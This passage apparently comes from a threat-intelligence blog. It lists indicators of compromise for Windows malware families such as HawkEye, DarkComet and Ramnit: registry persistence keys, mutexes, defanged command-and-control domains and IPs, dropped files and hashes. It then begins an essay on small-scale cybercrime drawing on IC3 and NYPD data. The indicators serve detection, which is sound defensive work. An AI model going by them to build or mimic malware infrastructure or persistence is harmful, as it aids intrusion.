%HOMEPATH%\ref\Bar.exe 1
%HOMEPATH%\ref\Bar.vbs 1
%HOMEPATH%\ma\No.exe 1
%HOMEPATH%\ma\No.vbs 1
%HOMEPATH%\ma 1
%HOMEPATH%\Oxy\Bru4.exe 1
%HOMEPATH%\Oxy\Bru4.vbs 1
%HOMEPATH%\tr\TEL.exe 1
%HOMEPATH%\tr\TEL.vbs 1
%HOMEPATH%\Oxy 1
*See JSON for more IOCs

File Hashes

1990701e4db9f573be94dbfd0e9edcb826c4a0ba858b42249812acb12cea572f 201ecff5a0b06b1401158972176bf3af310e1a25a9f603ea902b340f15262130 667fcc41313580c1c5dd3f74e84f13a4431a8b1daf4e1c60d5f3ab0c657e95ef 6754bcad108371e4192bc126187cf7ac07c39ea3f5ed7d975402a4c20d7fbcd4 68183c5baad715853bf2a38a2384288803a431ef4881be8c33b473f7e97d0186 6f70b508bcf39a1de4371f080c51bbf569ff5be7bf0f91793519c3c511710386 72d305998919d0c14d44659c0427e1130b9cf6539f386d328879c7d416ac085a 7cbbe9909fc023294a209ecf1b3882a02cb198d6841a129471201ce105c10d7f 905d2ba08aa3c839dfb815a373c5e2d0ae71badcbb1a70be1ef2683381dcb257 96eba5d5846bbcb803ffbac64ea5adf52fcb736ebda11abd466d509314dcc216 c2bfc250e5a0f8047d8eeb2bab36669e2d20becf57ddfa1e0ff5c33ff63864d5 cad62477913555b37902a162c9b437af27182fb219aa14647f257a0c48ddd556 d2a181619dc5bce7506d65bd893b411772de00c9ffdcbbcb9e3a78ab029a4997 d6e619e7f6f7578cef21ad4bea1ed94f397c0063aee69df329bc0aab3ea0b177 d9f6c0ffc135785c9c0355bad4cc4b8884f6f655c6e336c14b1b7a27568ddda9 dcd1f707b263fe1c37b94944b8399d92675d215d76aca304f0c7455250627d68 e9877a7c8d2daca6b15131b26a583695e4d5e2c05023b764f24a551666055b0a f22c91af53fd11dae4ebeeca1886c5a3355f68970cb554be7eb10affbb547341 f57f13ef3d153621588b9aa9a273e08a77069dd2b9b7d5ad08c579f24feedc41 f7ac5679a471bbc48cb5af2fd54ea2e4621f7e825c06fba59a1690fa6745e56f fd4de71e56062003053b8f93f6bb84188666361a07c415e56a4b015802237289

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Shiz-9958984-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 88 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
33
Mutexes Occurrences
Global\674972E3a 33
Global\MicrosoftSysenterGate7 33
internal_wutex_0x000000e0 33
internal_wutex_0x0000038c 33
internal_wutex_0x00000448 33
internal_wutex_0x<random, matching [0-9a-f]{8}> 29
internal_wutex_0x000007d0 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 16
45[.]33[.]23[.]183 9
96[.]126[.]123[.]244 8
198[.]58[.]118[.]167 7
45[.]56[.]79[.]23 6
45[.]33[.]30[.]197 6
45[.]79[.]19[.]196 5
173[.]255[.]194[.]134 5
72[.]14[.]178[.]174 5
72[.]14[.]185[.]43 4
45[.]33[.]2[.]79 3
45[.]33[.]18[.]44 3
45[.]33[.]20[.]235 2
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
fodakyhijyv[.]eu 33
qekusagigyz[.]eu 33
maxyjofytyt[.]eu 33
xudylenyrob[.]eu 33
pufepepazyd[.]eu 33
vopibycywow[.]eu 33
fotoxysupyd[.]eu 33
gaqehysohec[.]eu 33
lyxaxududes[.]eu 33
rycovuvutiq[.]eu 33
kevimudyqec[.]eu 33
jewidonevin[.]eu 33
tulekuvigij[.]eu 33
vocupotusyz[.]eu 33
galavozaxog[.]eu 33
divufozutog[.]eu 33
kefidaxupif[.]eu 33
jejykaxymob[.]eu 33
xutevexecif[.]eu 33
puryxepenek[.]eu 33
lysowaxojib[.]eu 33
dimigesupew[.]eu 33
fobatesohek[.]eu 33
ryhadyvigis[.]eu 33
qekikyvutic[.]eu 33
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 33

File Hashes

0426a2801b985679944d7956d57df0c195e4871cb5fa9ae5d3cb864600883613 06748264e401a4fcf30a802df0f390a75a14a3ff6148b8f064ee3e2585c742d9 09bf6eb80568c5d370d52e77ca1eddea41f0eb7e458549c994620b3e6af3967c 0affbf8c7691eaaab70491418b6db92cced36ff4a0a482673a4ebdd5492ad6c8 0fbe21b7ff8392a707d0d871494c2298e88e723ebcd7a4495c6a037232d4899b 11b3839df1c31d6c2f15591a0fa013c8b41862dd522d106c85876b49e7d561c0 11b6cfd9b8f56c8107511151282335f7b5f5d555665bec7506908515dcb6acab 11c19ec5a341f6a6bfa86170ea383439466f008ff42ec6dc04bd0445a658ba63 1641e6a92c47304c11521b9c875029a387e49b511438b3ac4c122ee7b14519de 1cac14ca2ad5715132446d1bb0503a6f783577d15f8fb97611dac9b7177903cc 1f4e2901cf95c9ca682d9e5c24235c11da57a47153969203e58b5528bd37b411 1f83440aab9dc62a6c4726b35ee58355b1cf76d23d194250397069423b17d281 237bf6bd91b6301dd01456859507771ed5fc2eda62f67e207bea6928f69573b9 253dc24fa6384c2c2757acc74ecfb88a231ab434c718e5b044a47e3fec4515f7 25525b728590f243275c528727c4887c3521fc16c25f60e3b364fb21e8b64dab 2553d02ff7f59fc5e0830783a508b4a5e8daff585bb4e5411c49bb34217f1b3d 259d0e1eb7a6ab82cfef210054b7cedd069d331455d6c0effff450c514fef6b1 2796098904f867adffd735f528461e5fb8be9f33ebd22bc37fb58684c3476112 27de5dc0ae67097bc22a0bcb3381dcebc372c469c4b8effe2b83d87f85f01cc1 2a6f60367dc3d70d2db9926e28dba4d79f20e319ceaf839c094cf85c9850c99a 2c729b76866357b2fae9d51f4d5f69c1554b18b5be35f896300631b7409e49e7 319155806bbb3e74cc753ed768a13455965e1fa7a175155f5862c2e030c2e35a 34b2879998dfd238977cf19e5f4e3d4cbccfa61a9b0688e43a569e19a75a2844 3578be24b2fe30600747846c30c1e286622e1906fce1a801e10b87117bf37ef4 385ddefdb0c298b4cd194b165f82e9ddec8c8e6616160e432125e576dae5603c
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.HawkEye-9959777-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
5
<HKCU>\SOFTWARE\[email protected] 3
<HKCU>\SOFTWARE\[email protected]
Value Name: NewIdentification
3
<HKCU>\SOFTWARE\[email protected]
Value Name: NewGroup
3
<HKCU>\SOFTWARE\[email protected]
Value Name: FirstExecution
3
Mutexes Occurrences
<random, matching '[A-Z0-9]{14}'> 4
X43238C48CI4NY_SAIR 1
M21V21V8G7Q66R_SAIR 1
05V015TT37XDUJ_SAIR 1
Global\07657600-129e-11ed-9660-0015174b6151 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]16[.]155[.]36 6
104[.]16[.]154[.]36 5
77[.]88[.]21[.]158 2
142[.]251[.]16[.]109 2
208[.]91[.]199[.]224 1
208[.]91[.]198[.]143 1
208[.]91[.]199[.]223 1
192[.]99[.]212[.]64 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
whatismyipaddress[.]com 11
kalashas[.]no-ip[.]biz 3
smtp[.]gmail[.]com 2
smtp[.]yandex[.]ru 2
mail[.]siliconsss[.]com 2
smtp[.]impexservicesindia[.]com 2
smtp[.]vsnl[.]net 1
smtp[.]thanawalagroup[.]net 1
Files and or directories created Occurrences
%APPDATA%\pid.txt 11
%APPDATA%\pidloc.txt 11
%TEMP%\holdermail.txt 10
%APPDATA%\WindowsUpdate.exe 10
\Sys.exe 3
\autorun.inf 3
E:\autorun.inf 3
%TEMP%\Administrator7 3
%TEMP%\Administrator8 3
%TEMP%\Administrator2.txt 3
\directory 3
\directory\CyberGate 3
\directory\CyberGate\install 3
\directory\CyberGate\install\server.exe 3
%APPDATA%\Administratorlog.dat 3
%TEMP%\SysInfo.txt 3
%APPDATA%\Windows Update.exe 3
E:\Sys.exe 3
%System32%\drivers\etc\hosts 1
%TEMP%\oUK6NMZIZls5Ku6i.exe 1
%APPDATA%\6tOsSNNvNp7JOgxS 1
%APPDATA%\g3h44Njnele2nJzi 1
%APPDATA%\g3h44Njnele2nJzi\ZOqlaWVQEXMz.exe 1
%APPDATA%\6tOsSNNvNp7JOgxS\ChSV1JzLaHOS.exe 1
%APPDATA%\hAtRUbl2c5ywfar3 1
*See JSON for more IOCs

File Hashes

04e516d05c22e5489ba47b5e1bd03f6cb8bcf2b084e2b3dae23acbe25d4b4591 21e52c431fce5ea651800127be440f447fafd20c3d74f34b0d712e140b0c138d 21e949c72bc90a7b4647b305dd306e343f732ad2b898dba5e9b920edc33fc9a0 220c6f3ffe28c8c7cd3f3b669b47bccdde30b200ab1de9bd0cca55c475ad62cb 2f656303daecf2322749ed2a4b69b7124433dfea94d658c9e1e18d415db16456 32a841f8eaf7fa85d3c78469a9890988c1c9b90c97cfba674ac8f9f991bd3a94 4000b5bce992bdbdd73174fbe1e8d9b0fd65ad6c88f282889a8604dfa9fe0f59 5291c5d0bd7eaee2402fb660be1b8501c3a712471e9d66062b6728794909263a 5393c5a558225a02a03ee8ea46968d53a72b57194261e17dc7e35f0bd9b630ea 628eb845ab8309303d0ebb7448063dbafd36954a66596977a272d5806cacaeca 656d25151b846944e11c7ba03ce4fae066f7a8c29cdce84d0b241d4305a4245c 6d155125192252b756c6af33bca25810ab9a19be347e5793b534802662eb00a4 9a8797b6c2753e70ce0888185473510f40d3c0ff45b81b639dc8c077cb3679ec ad52ce9456cb87f713ad43de89835e0c882fd3a77389bb41ab50396efd59088a c4bf7dbe799d71e8e16c1aa5ca3f3af04f174b91e1a357a02e38b0155a46a600

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Worm.Kuluoz-9959792-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uecguckk
1
<HKCU>\SOFTWARE\AEAKVJGE
Value Name: ujaduqcw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cuhmadmx
1
<HKCU>\SOFTWARE\UDVFKDFC
Value Name: vdqcxwxs
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lhelwsfg
1
<HKCU>\SOFTWARE\SFLQPFKG
Value Name: pvgxfqel
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wrbmmivh
1
<HKCU>\SOFTWARE\SMXPKGUG
Value Name: cdjmiong
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: agokwqgv
1
<HKCU>\SOFTWARE\NGWWUMBN
Value Name: fpesjwgk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bomrkrmk
1
<HKCU>\SOFTWARE\LSCPUEQM
Value Name: lsekxadg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bxvvsgvr
1
<HKCU>\SOFTWARE\HIDBXWKK
Value Name: wudcreed
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: snwmmmvf
1
<HKCU>\SOFTWARE\TCUDAEVA
Value Name: dfvkflcs
1
<HKCU>\SOFTWARE\MNQGHNOP
Value Name: dlirvvqw
1
<HKCU>\SOFTWARE\MNFTGNBG
Value Name: csfqppjx
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: imcfhgpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: oqpeifcm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lhxptbjv
1
<HKCU>\SOFTWARE\HQMHIWJP
Value Name: durqeakc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hsrhcrvj
1
<HKCU>\SOFTWARE\CGOEUIAE
Value Name: htpvdufk
1
Mutexes Occurrences
2GVWNQJz1 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
173[.]203[.]97[.]13 15
76[.]74[.]184[.]127 13
37[.]59[.]82[.]218 13
94[.]32[.]67[.]214 13
212[.]45[.]17[.]15 13
142[.]4[.]60[.]242 13
50[.]57[.]139[.]41 12
82[.]150[.]199[.]140 12
92[.]240[.]232[.]232 10
113[.]53[.]247[.]147 10
203[.]157[.]142[.]2 9
176[.]31[.]181[.]76 9
188[.]165[.]192[.]116 7
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

01d6c50b70eb28d693e74b7ad15158707b8f57a9711e35c07d3d1c4ee7f630ee 08c25287e368a2158b029684e74626ba867a606837cce07ea2837b6ed78857a4 09bb26d956e0eb8aba714e836c041d844ac01eb4ccb3e498382c07ae3e267ff4 0bf1e31c2a0fe232876deef8bad8cbe1e08a3ad377db920ffc27c4852ef1dc89 0c6ec5510575da4416321eb58b20d3e447746e0cea1ffd06241f8a1e6bbb2837 0dd0361ead8f0e962be7a115dd8a4fa9d1a12b88c11633f82cfeae655a59f809 0fb3d456de4717b29c3a332e29a10cc9c52c94c92f6438f32791f5a5785b603b 1052ac160c67084f7dae6af5d9ee545fb0df20b99b8e989177ffb795a32aa35c 192d087160aad1afdb5ed06eb4128d997e578af554a626887746d91e66bc688a 1f4a448e60174255ef3d7492e60464ef4cfd84f65acb8c9824493b71d6864b8f 1f7810a638c2f1825276f2784cf557d7610ca0eabb463d06e6b25597fd077043 230a54a47fed1921adb452b5e88f1467e021dd85aac8f0d60a5a41912b991d28 26cad8fc0603c849db06f59e46b452bb4c3fe5cadfd46e344ce9a7f10365ddb8 276bb12ea62aa7f7ffce0531b84bbe1f7f2e6a19f4150ca6a7b1c69f4662b595 286bc1cee4c188350c8bb50812e30f7bec0b794efca5a2eb0b12368b479211b3 2938109eee69fe708fa15752e0723d110a01ee4e3e1e804cc97bbde01267fdb8 2a850531aeb725e5f138b9b1158640fe41c05a25560e2550fa2b070d96490a8e 31266599481409d70b317821d5af1aea693e7c1c7cedd04fd5dec0008bd816a7 384b51772d288e63038e146446e6e84b1f737cd3d8d34c3871d875fda77ff29a 38e1edffa779f9e2dd16104c35fc7a6c4a21dff7f3ad9bc8233b5817e8666441 3949d166ce5f75648fcb66ea3f9aaf251aa9847d576aef7d10b2830a295e2096 3ffee22fa7f00e260b92385c8cda56eee17c133b7c47cb33cf701d0c9e2ae89e 419c33660b59de42d150f8c1163873db94fa59e8d684bb44d0ec866eaebd00a7 441c34ba7b9ee2d7b0506013a2fb9fd5c5b517d38a66e1228edf4d7e1e20b9e8 446d8276a7008c24317b101c5d7050da5f1a51301a47842cd35f5d8a362eee83
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.DarkComet-9959797-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 11
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
11
Mutexes Occurrences
DCPERSFWBP 11
DC_MUTEX-01SYFCM 11
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
zapto666[.]zapto[.]org 11
sildelanoe2[.]zapto[.]org 11
Files and or directories created Occurrences
%ProgramData%\Microsoft\Windows\Start Menu\Programs\MSDCSC 11
%ProgramData%\Microsoft\Windows\Start Menu\Programs\MSDCSC\msdcsc.exe 11

File Hashes

236c360d988e5b28b1a4eee229d0f3b5baa203043fc5ae8f016519f753e6b6bf 27990599b2e3ae192d5a897ed30cb98a20eae1d3ed8506dac8d82fef9ed9442e 53cd48d7d092d55fdc35966cfbd01861bf7304f9dc694237d322ff189adb32a4 55754ae53d9555a67d25be9cd73b5d85141d4ef43cd55ae2cf237be1cfa0d965 5dcd64134e33496cdd5ad13012b35834164d59d470a17359710a335469fdf35a 6e0d5bd7c55c9ec287377f8cadd342768c887a8901d015253996112442ff5d6f a53ebd4f480bdf3cf2199692af1d27c2864fc5c038fefed214688416cc2a1066 acaf2d6a74e24b2ab85338fa62efc85d76f6ec9c1cd11657230d975fd0dcde42 c4c677ab5115a0a568d1817528005ad24d0dc06ddd9d738d5f1fb75a3074b3f0 d2e83abd3d779b825e4088f53b43aa8521131a9ebd0dad8006e70fcc0e249e8d eea1adee202040b2c06dfb226eacd4c662b57714f44ffcc0561ff8cb2ec2a6d6

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Ramnit-9960101-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT
Value Name: AlternateShell
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WlkSgauv
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: ImagePath
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: DisplayName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: WOW64
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: DeleteFlag
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MICORSOFT WINDOWS SERVICE
Value Name: Start
15
Mutexes Occurrences
{79345B6A-421F-2958-EA08-07396ADB9E27} 15
{7934684F-421F-2958-EA08-07396ADB9E27} 15
{7934723B-421F-2958-EA08-07396ADB9E27} 15
{7934684E-421F-2958-EA08-07396ADB9E27} 15
{<random GUID>} 15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
82[.]112[.]184[.]197 15
72[.]26[.]218[.]70 15
195[.]201[.]179[.]207 15
208[.]100[.]26[.]245 15
35[.]205[.]61[.]67 15
142[.]250[.]80[.]14 15
75[.]2[.]18[.]233 15
172[.]105[.]157[.]192 15
46[.]165[.]220[.]150 15
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
kbadlfpgtec[.]com 15
ymcwineqkj[.]com 15
tupexbvpmsc[.]com 15
mwsjitqbf[.]com 15
ccsnpnqxii[.]com 15
dpdadshi[.]com 15
eljmrnwualb[.]com 15
hjxrksvo[.]com 15
lfnjosunfd[.]com 15
paoxlrmbg[.]com 15
qekgxfrk[.]com 15
uhjwxipj[.]com 15
mkmngqxwk[.]com 15
ybmhumhymqj[.]com 15
qopdypfxhda[.]com 15
pfkilgedjhq[.]com 15
sgimiytkanu[.]com 15
leqnxekmi[.]com 15
ieugluxmlx[.]com 15
elieidkolpc[.]com 15
oluddrbaeb[.]com 15
skroackqs[.]com 15
pbfttfgw[.]com 15
ujypninrop[.]com 15
qpvvabbaqcn[.]com 15
*See JSON for more IOCs
Files and or directories created Occurrences
%LOCALAPPDATA%\wblmbpwi.log 15
%LOCALAPPDATA%\xrpatmbf.log 15
%LOCALAPPDATA%\ntqipnfr 15
%LOCALAPPDATA%\ntqipnfr\wlksgauv.exe 15
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wlksgauv.exe 15
%TEMP%\dljcankv.sys 15
%TEMP%\oqinictcdtumygeo.exe 15
%LOCALAPPDATA%\ntqipnfr\px1F71.tmp 1
%LOCALAPPDATA%\ntqipnfr\px26AF.tmp 1
%LOCALAPPDATA%\ntqipnfr\px203A.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1CC1.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2B70.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2BFD.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1EB4.tmp 1
%LOCALAPPDATA%\ntqipnfr\px1B98.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2365.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2307.tmp 1
%LOCALAPPDATA%\ntqipnfr\px28A3.tmp 1
%LOCALAPPDATA%\ntqipnfr\px25C5.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2DD1.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2BED.tmp 1
%LOCALAPPDATA%\ntqipnfr\px2529.tmp 1

File Hashes

10df6ef7114ab16c25690d0183960e51d80488690e4f52680be2cf38d4aeb85b 1b39ecf9dc61b7e01c410b02eb8cb5c01ccdb1346474c62d7b916a9fb136681e 25354347217865d4e0a18080a942021de378cdcdff3633edc32583d892639569 265febc90d4163d2d1f29c0f07c8b003002ec7ee9ca4a3f8607ca5364cf06dc3 370c3bdde1b51bf0b9d079e644871b79848ac588c37ea7f89c94a2e2c3103642 3b955ab71c4147497bb1aa0fd65ee9b94bb1cbc897a0be46427f0f66a829de5d 55835f514e7ab6da28a6c69a3ffbe2d356b8ca987a274bc7a190689a57cbfbf2 615c3bfaa531cda8c1ac55bf9d5d93598617cd208702a7ce4c26cd94b2f2d4fd 61657d27b739df7dd856194cc29354ebf9d4a9abe3cb37d8782b5e6bddcba23c 7227840a73bce222d285d89cb1f528a5f5caf230af943a78f85f5e07136f1c4f 91cec64e347f7355c3dabb30b6e70c73d8a16890aa698ef526476930b998dd78 b70d31148f0b79548b7a2fd3a16228b32b0c52432b19b9d651fc9d6f9458c845 b7841d3db93f9a48887fdb82d3492b43f33f36ee8959e4f26a74c77962793e65 e80bad25222ffce33d1fa8c5962b235fecdce744b6dcf9c35db869844802573c ee4d65ec638095b28ec9c1290bf3edac8c767fb2a094c00925fabcde83dfb205

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Small-time cybercrime is about to explode — We aren't ready

8 August 2022 at 12:42

The cybersecurity industry tends to focus on extremely large-scale or sophisticated, state-sponsored attacks. Rightfully so, as it can be the most interesting, technically speaking.

When most people think of cybercrime they think of large-scale breaches because that's what dominates the headlines. However, the problem is much bigger. In 2021, the Internet Crime Complaint Center (IC3) received a staggering 847,376 complaints, with each victim losing a little more than $8,000 on average. Once you account for the high-value breaches, the true impact is even lower. The average person is far more likely to have their identity stolen or fall victim to some other sort of scam than be directly affected by a large-scale breach — and business is booming.

A deeper look at the data from IC3 shows that the amount of complaints and revenue being generated from cybercrime continues to rise. Interestingly there is a huge jump in cybercrime during the pandemic with a staggering increase of more than 60% in complaints between 2019 and 2020, with it increasing further in 2021. It's clear that cybercrime is on the rise, but what's driving it?

There have been a variety of reports that criminals are turning increasingly to cybercrime instead of traditional drug crimes, with which they were commonly associated in the past. This is both a blessing and a curse — it removes a lot of violence and crime from the streets but is adding a significant amount of pressure on local law enforcement. This is an international problem. Several recent reports highlight that this is also an issue in Italy and Spain.

There are cybercriminals everywhere and the U.S. is no exception. What's changed is who is involved. Historically, cybercrime was considered white-collar criminal behavior perpetrated by those that were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and desire can get started in cybercrime. The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft.

Cybercrime is a local law enforcement problem


For cybercrime to get the attention of national law enforcement, it needs to rise to a certain level. In most cases, that means the monetary value of the crimes. Effectively, a criminal needs to steal a lot of money to get the attention of the FBI or other national law enforcement agencies — and criminals know it. The majority of the cybercrime street criminals are operating in doesn't garner the attention of national law enforcement, since it's much easier to cash out a small payday than it is to cash out large lump sums of cash. A criminal can walk into a big box store and buy a couple hundred dollars worth of gift cards using a stolen credit card relatively easily. Trying to cash out the $100,000 in Bitcoin they just stole in a scam is much more challenging.

The wave of cybercrime that's coming isn't going to be targeting huge multinational corporations looking for millions of dollars, it's going to scam folks out of their tax return or sign them up for fraudulent unemployment benefits. One thing that might become increasingly popular is the return of identity theft and associated credit card fraud. Ransomware cartels dominate the headlines with the tens or hundreds of millions of dollars they are taking in, but it's the low-level criminal compromising those around you that will be an urgent challenge in the months and years ahead.

Quantifying criminal activity presents challenges with interesting results


The IC3 data clearly shows that cybercrime is on the rise, but can it be correlated with a decrease in other forms of crime, or is it net-new bad actors? When initially looking at this topic, we were curious if there are trends pointing to reduced crime rates in some categories. The thought is that as more criminals move into cybercrime, we would see reductions in other types of crime. However, not all crime is created equal, and the challenge becomes, "How do you compare criminal behavior?" We started looking at the types of felonious crime that are commonly prosecuted in America and there were two big buckets of potential crossover criminals: violent crime and drug crime. We decided to focus specifically on felony drug crime since both drug and cybercrime tend to be non-violent offenders but wanted to include the violent crime landscape to see if there have been any noticeable shifts.

Being in a pandemic means we needed to look at a larger dataset extending beyond the pandemic, as some of the data could be skewed. Granular data on crime isn't widely available, but some of the larger police departments in the U.S. do publicly expose some of that data, most notably the New York Police Department. These larger cities are often considered a bellwether for the way the country as a whole will shift in the months and years ahead.

The NYPD breaks out data in a variety of categories, including various types of felonies. We focused specifically on the non-seven major felony offenses that included felonies for drugs and weapons. To avoid biased data from the pandemic, we began looking at the data beginning in 2013 and ending with the end of 2021, as the 2022 data is still being gathered. The resulting data paints a pretty clear picture of how crime has changed in the past eight years.

Clearly, the amount of drug felonies over the past eight years has dropped off drastically before stabilizing during the pandemic. Interestingly, over the same period, the amount of weapons-related felonies has stayed largely static, with small shifts from year to year. The question then becomes, "Did a large number of people decide to stop committing crime or have criminals moved into different criminal ecosystems?"

